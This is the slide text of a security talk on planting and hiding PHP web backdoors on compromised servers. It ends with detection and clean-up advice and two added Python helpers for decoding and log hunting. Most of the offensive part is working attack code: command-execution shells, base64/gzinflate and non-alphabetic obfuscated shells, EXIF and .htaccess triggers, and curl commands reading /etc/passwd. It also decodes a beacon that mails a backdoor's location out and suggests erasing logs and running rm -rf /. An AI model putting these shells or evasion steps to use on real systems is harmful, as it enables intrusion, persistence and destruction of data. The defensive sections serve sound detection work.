Art of Web Backdoor - Pichaya Morimoto
Art of Web Backdoor
stealth ways to hide your ass in pwned box
Pichaya Morimoto
[email protected]
linkedin.com/in/pich4ya
Computer Crime Act B.E. 2550 (2007)
Section 5: Whoever unlawfully accesses a computer system that has a specific access-prevention measure which is not intended for their use shall be liable to imprisonment of not more than 6 months or a fine of not more than 10,000 baht.
Section 7: Whoever unlawfully accesses computer data that has a specific access-prevention measure which is not intended for their use shall be liable to imprisonment of not more than 2 years or a fine of not more than 40,000 baht.
Section 9: Whoever unlawfully damages, destroys, corrects, changes or adds to, in whole or in part, the computer data of another person shall be liable to imprisonment of not more than 5 years or a fine of not more than 100,000 baht.
Legal Warning
★ Anatomy of (PHP) Web Hacking
★ Maintaining Access
★ Techniques
★ Covering Tracks
★ Case Studies
★ Detect / Clean up
Overview
OWASP Top Ten 2013
A1 - Injection
A2 - Broken Authentication and Session Management
A3 - Cross-Site Scripting (XSS)
A4 - Insecure Direct Object References
A5 - Security Misconfiguration
A6 - Sensitive Data Exposure
A7 - Missing Function Level Access Control
A8 - Cross-Site Request Forgery (CSRF)
A9 - Using Components with Known Vulnerabilities
A10 - Unvalidated Redirects and Forwards
How do we plant a web backdoor?
High Risk
Medium Risk
Low Risk
Public CMS/Plugins PWN
1. Vulnerability Assessment and Mapping
   ★ Vulnerable version? Does the vulnerability exist?
   ★ Do the conditions match? / Known limitations
2. Exploitation
   ★ Is a public exploit available?
   2.1 Yes - just use it
       ★ Review & test
   2.2 No - source code analysis
       ★ Patch file (.diff) / $ diff -ENwbur vul-src/ patched-src/
       ★ Issue tracker (SVN/GIT repo.)
       ★ Public / private vulnerability discussion
3. Zero-Day - for l33t h4x0r!
   ★ Source code analysis without a patch, valuable!
Affected Versions: 2.5.x <= 2.5.13 and 3.x <= 3.1.4 Fixed Date: 2013-July-31 (2.5.14, 3.1.5)
Joomla! - Unauthorised Uploads
Vulnerable files
1. libraries/joomla/filesystem/file.php
2. administrator/components/com_media/helpers/media.php
Scenario
1. Joomla! <= 2.5.13
2. User with author privilege
3. OS = Windows machine, or misconfigured Apache + Linux
Bypassing File Upload Restrictions in Joomla!
Known Issues or Limitations
Backdoor is a Feature for Admin!
Also in IPB, SMF, vBulletin
Latest vBulletin 5.0.4 - PHP Module
http://www.ubuntuforums.org/
★ Hacked on 14 July 2013, defaced on 20 July 2013
★ 1.82 million users' data leaked
★ Attacker had full access to the forum app servers
★ Servers were running the latest version of vBulletin
Case Study - Official Ubuntu Forums
What happened (posted in Canonical Blog)
● A moderator account was hacked
● Attacker posted XSS to the forum and sent it to an admin
● 31 seconds later .. the admin account was PWNED
Invision Power Board <= 3.4.4
Released on: 2013/05/13 by @johnjean
Logical Vulnerability + Bad Sanitization
1. Create a new user using [email protected]+[150 spaces]+A
2. MySQL limitation! Strings exceeding 150 characters are truncated and the value is trimmed, so an arbitrary user ends up with the same email as the admin and can change the admin password!
IPB - Bad Sanitization
3rd party components
★ uploadify, ckeditor, ckfinder, tinymce, openx
Shared Hosting Security
★ Exposed session data
★ Improper user privileges (OS/code execution, critical file manipulation)
★ Vulnerable services (SSH, FTP etc.)
MITM, Insider attack, lack of physical access control etc.
Other factors
Add arbitrary accounts (*nix shadow, AD etc.)
Reverse shell and/or bind shell using ...
★ Binary/Script Backdoor
  1. Bind a port to a *nix shell
  2. Send a *nix shell back to the attacker
  3. Make a relay tunnel
  4. Hidden trigger to spawn a shell
★ Web Backdoor - uses less privilege!
  Connect via HTTP methods & headers (GET/POST etc.)
Maintaining Access
<?php
if (isset($_REQUEST['cmd'])) {
    echo "<pre>";
    $cmd = ($_REQUEST['cmd']);
    system($cmd);
    echo "</pre>";
    die();
}
?>
Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd
$ curl -d "cmd=cat+/etc/passwd" http://target.com/simple-backdoor.php
Simple PHP Backdoor
Hide your ASS
Passing variables to PHP global vars:
$_GET
$_POST
$_COOKIE
$_REQUEST
$_SERVER['HTTP_CMD']
Communication
$ curl -A- -vvv 127.0.0.1/test1.php -H "Accept_Encoding: @system('uname -a;ps -aux');"
1. Encode (attacker client)
$ php -r "echo base64_encode(gzdeflate('system(\"id\")'));"
K64sLknN1VDKTFHSBAA=
2. Send (attacker client)
$ curl -A- -vvv 127.0.0.1/test3.php -d "cmd=K64sLknN1VDKTFHSBAA="
3. Decode (PHP backdoor)
@eval(gzinflate(base64_decode($_POST["cmd"])));
4. Output
uid=33(www-data) gid=33(www-data) groups=33(www-data)
base64_decode() + gzinflate()
1. assert()
assert('sys' . 'tem('.$_POST["cmd"].')');
$ curl -A- -vvv http://target/evil.php -d "cmd='ls -lha'"
2. preg_replace() with -e modifier (deprecated in PHP 5.5.0)
preg_replace('/(.*)/e', base64_decode($_POST["cmd"]), '' );
$ curl -A- -vvv http://target/evil.php -d "cmd=c3lzdGVtKCdpZCcp"
3. And many more, e.g. OS command execution; check out this link!
http://stackoverflow.com/questions/3115559/exploitable-php-functions
Code Evaluation besides eval()
★ GNU license in beginning of a PHP file!
/* Copyright (C) 1991 Free Software Foundation, Inc.
   This file is part of the GNU C Library.
   … */
<?php ...
★ PGP Public Key !?
/* -----BEGIN PGP PUBLIC KEY BLOCK-----
   Version: GnuPG v1.4.10 (GNU/Linux)
   ... */
<?php …
★ Software license PROHIBIT to decode
Stupid trick, but it works!
★ More creative filename!
○ lndex.php
○ 1ndex.php
○ index2.php
○ wp-manual.php
○ cat.jpg.php
○ license.txt
○ README.md
○ .bash_profile
1. Create EXIF metadata using exiftool
$ exiftool 2600.jpg -Software=system
$ exiftool 2600.jpg -Model=id
2. Put 2600.jpg alongside the backdoor
$A = exif_read_data('2600.jpg');
$A['Software']($A['Model']);
3. Browse to the backdoor and boom!
uid=33(www-data) gid=33(www-data) groups=33(www-data)
PHP: exif_read_data()
1. Apache Configuration
AllowOverride All
2. .htaccess
<FilesMatch "2600.jpg">
    SetHandler application/x-httpd-php
</FilesMatch>
3. 2600.jpg
<?php @system($_POST["cmd"]); ?>
.htaccess + any file format
<?@$_POST[0]($_POST[1])?>
$ curl -A- "http://target/backdoor.php" -d "0=system&1=uname+-a"
one statement PHP backdoor
Binary Code in PHP Shell
<?$_="";$_[+""]='';$_="$_"."";
$_=($_[+""]|"").($_[+""]|"").($_[+""]^"");?>
<?=${'_'.$_}['_'](${'_'.$_}['__']);?>
$ curl "http://target/backdoor.php?_=shell_exec&__=uname+-a"
*** This code contains non-printable characters, it might not work if you copy & paste! ***
non-alphabet PHP shell
★ Works on various OS types (win/linux/osx) and ISO ??
★ Find writable directories
★ Read/write files
★ Merge into every file
★ Merge into backup db / files / zip
★ Reverse/bind PHP shell
★ Database client
★ File management (symlink?)
★ AV/IDS/IPS/WAF detection
★ Credential dumper
★ OS commands
★ Network scanner
★ TCP/UDP/HTTP/DNS amp flood
★ SOCKS proxy for pivoting
★ HTTP proxy, IRC connect back
★ etc.
Common survivor feature!
Exploit Pack
c99
r57
wso
icfdkshell
weevely
ASPsh
msfpayload
Use at your own risk!
Free Kiddies Backdoor!
Caution! There are many cases where a backdoor is served inside another backdoor,
e.g. http://packetstormsecurity.com/files/download/117974/wso2.5.1.zip
$x10="\x6dai\154";$x0b=$_SERVER["\x53\x45RVE\122_\x4eAM\x45"].$_SERVER["\123\103\x52I\x50\x54_\116\101\115E"];$x0c="\141r\162a\171\040".$x0b;$x0d=array("\143\x61","\x6c\x69","\146\x77\162\151\x74\x65","\100","v\x65\x2e");$x0e=$x0d[2].$x0d[3].$x0d[1].$x0d[4].$x0d[0];$x0f=@$x10($x0e,$x0c,$x0b);
Decoded:
mail(“[email protected]”,”target/backdoor.php”,”target/backdoor.php”);
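Two analyst-side helpers, added here as an example and not part of the original talk or of any of the tools it names: decode_php_string() resolves the \xHH and \NNN escapes that the obfuscated mail() beacon above relies on, so the hidden strings (the function name, the $_SERVER keys) can be read without executing the file, and inflate_payload() reverses the base64_encode(gzdeflate(...)) encoding from the Communication slides, which is what you need to see what a captured request actually asked a backdoor to run. The sample snippet is the first two statements of the obfuscated code shown above; the payload string is the one from the encode step. Function names are my own.

```python
import base64
import re
import zlib

# PHP double-quoted string escapes: \xHH (1-2 hex digits), \NNN (1-3 octal digits)
# and the single-character escapes PHP recognises.
_PHP_ESCAPE = re.compile(r'\\x([0-9A-Fa-f]{1,2})|\\([0-7]{1,3})|\\([nrtvef\\$"])')
_SIMPLE = {'n': '\n', 'r': '\r', 't': '\t', 'v': '\v', 'e': '\x1b',
           'f': '\f', '\\': '\\', '$': '$', '"': '"'}

# Constructed sample: the first two statements of the obfuscated mail() beacon above.
SAMPLE = r'''$x10="\x6dai\154";$x0b=$_SERVER["\x53\x45RVE\122_\x4eAM\x45"].$_SERVER["\123\103\x52I\x50\x54_\116\101\115E"];'''


def decode_php_string(body):
    """Resolve the escape sequences inside the body of a PHP double-quoted string."""
    def repl(m):
        if m.group(1) is not None:          # \xHH
            return chr(int(m.group(1), 16))
        if m.group(2) is not None:          # \NNN octal, wraps at one byte like PHP does
            return chr(int(m.group(2), 8) & 0xFF)
        return _SIMPLE[m.group(3)]
    return _PHP_ESCAPE.sub(repl, body)


def decode_all_strings(php_source):
    """Return every double-quoted literal in a PHP snippet, decoded, in source order."""
    return [decode_php_string(m.group(1))
            for m in re.finditer(r'"((?:[^"\\]|\\.)*)"', php_source)]


def inflate_payload(b64):
    """Reverse base64_encode(gzdeflate($code)). gzdeflate() emits a raw DEFLATE
    stream, so zlib is told there is no zlib/gzip header (negative wbits)."""
    raw = base64.b64decode(b64)
    return zlib.decompress(raw, -zlib.MAX_WBITS).decode('utf-8', errors='replace')


if __name__ == '__main__':
    print(decode_all_strings(SAMPLE))          # ['mail', 'SERVER_NAME', 'SCRIPT_NAME']
    print(inflate_payload('K64sLknN1VDKTFHSBAA='))
```

Decoding statically, rather than running the snippet through php -r, matters because the beacon's first action is to report the script's own location to an outside address; reading the strings is enough to know that.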
★ root?
★ logs e.g. /var/log/*
★ history e.g. ~/.bash_history
★ self-destruction
★ rm -rf /
Covering Tracks
★ Follow secure coding guidelines
★ Security hardening checklists
★ Critical file integrity monitoring
★ VA / Pentest by certified guys
★ Patch management & patch auditing
★ Centralized log & WAF?
$ iptables -A OUTPUT -m string --algo bm --string 'FilesMan' -j DROP
Detect / Prevent
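The iptables rule above catches one shell by one response string; the request side is where the file-name and parameter tricks from the earlier slides show up. As an added example, not part of the original talk, here is a small hunt over Apache combined-format access-log lines for those patterns: index.php look-alikes and double-extension names, dotfiles requested over HTTP, cmd / _ / __ / 0 / 1 style parameters, POSTs to PHP files that are not known application entry points, and an empty or "-" User-Agent such as curl -A- sends. The log lines are constructed samples; KNOWN_ENTRYPOINTS and the indicator lists are assumptions to be tuned for the real application.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Apache "combined" log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$')

# File-name tricks from the "More creative filename!" slide.
SUSPICIOUS_PATHS = [
    (re.compile(r'/[l1]ndex\.php$'), 'index.php look-alike'),
    (re.compile(r'\.(jpe?g|png|gif|txt|md)\.php$', re.I), 'double extension'),
    (re.compile(r'/\.[^/]+$'), 'dotfile requested over HTTP'),
]
# Parameter names used by the simple, one-statement and non-alphabet shells.
SUSPICIOUS_PARAMS = {'cmd', '_', '__', '0', '1'}
# Assumption: the PHP files that legitimately receive POSTs in this deployment.
KNOWN_ENTRYPOINTS = {'/index.php', '/administrator/index.php'}

# Constructed sample log lines (not real traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [20/Jul/2013:10:01:02 +0000] "GET /index.php?option=com_content HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.9 - - [20/Jul/2013:10:02:11 +0000] "GET /images/cat.jpg.php?cmd=cat+/etc/passwd HTTP/1.1" 200 812 "-" "-"
10.0.0.9 - - [20/Jul/2013:10:03:40 +0000] "POST /wp-manual.php HTTP/1.1" 200 33 "-" "-"
10.0.0.9 - - [20/Jul/2013:10:04:05 +0000] "GET /1ndex.php?_=shell_exec&__=uname+-a HTTP/1.1" 200 120 "-" "curl/7.30.0"
10.0.0.7 - - [20/Jul/2013:10:05:00 +0000] "GET /.bash_profile HTTP/1.1" 404 210 "-" "Mozilla/5.0"
"""


def analyse_line(line):
    """Return a finding dict for one log line, or None if the line does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group('target'))
    reasons = [why for rx, why in SUSPICIOUS_PATHS if rx.search(url.path)]
    hit = set(parse_qs(url.query, keep_blank_values=True)) & SUSPICIOUS_PARAMS
    if hit:
        reasons.append('backdoor-style parameter: ' + ', '.join(sorted(hit)))
    if (m.group('method') == 'POST' and url.path.endswith('.php')
            and url.path not in KNOWN_ENTRYPOINTS):
        reasons.append('POST to PHP file outside the known entry points')
    if m.group('ua') in ('', '-'):
        reasons.append('empty User-Agent')
    return {'ip': m.group('ip'), 'time': m.group('time'), 'path': url.path,
            'status': m.group('status'), 'reasons': reasons}


def hunt(lines):
    """Keep only the lines that tripped at least one indicator."""
    return [f for f in map(analyse_line, lines) if f and f['reasons']]


if __name__ == '__main__':
    for f in hunt(SAMPLE_LOG.splitlines()):
        print(f['ip'], f['path'], f['status'], '|', '; '.join(f['reasons']))
```

Note that a 404 still counts: a request for a dotfile or a look-alike name that does not exist yet is a probe worth knowing about, and POST bodies never reach the access log, which is why the header- and body-carried variants from the Communication slide need mod_security or a WAF rather than log review.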
var_dump(in_array('mod_security2', apache_get_modules()));
print_r(apache_get_modules());
MOD_Security ?
1. Change/reset passwords
2. Review log files
3. Hunt for vulnerable apps/backdoors
4. Backup || Recovery
$ grep - common dangerous functions
$ find
  ★ newly created files
  ★ certain conditions (time/date/permission)
Clean up
Capture The Flag
https://ctftime.org/
Online challenges
http://www.root-me.org/en/Challenges/
http://wargame2k10.nuitduhack.com/
http://captf.com/practice-ctf/
http://www.overthewire.org/wargames/natas/
http://www.modsecurity.org/demo/
VM Labs
http://blog.g0tmi1k.com/2011/03/vulnerable-by-design.html
https://pentesterlab.com/exercises/
http://vulnhub.com/
Practical Hacking?
Thank you!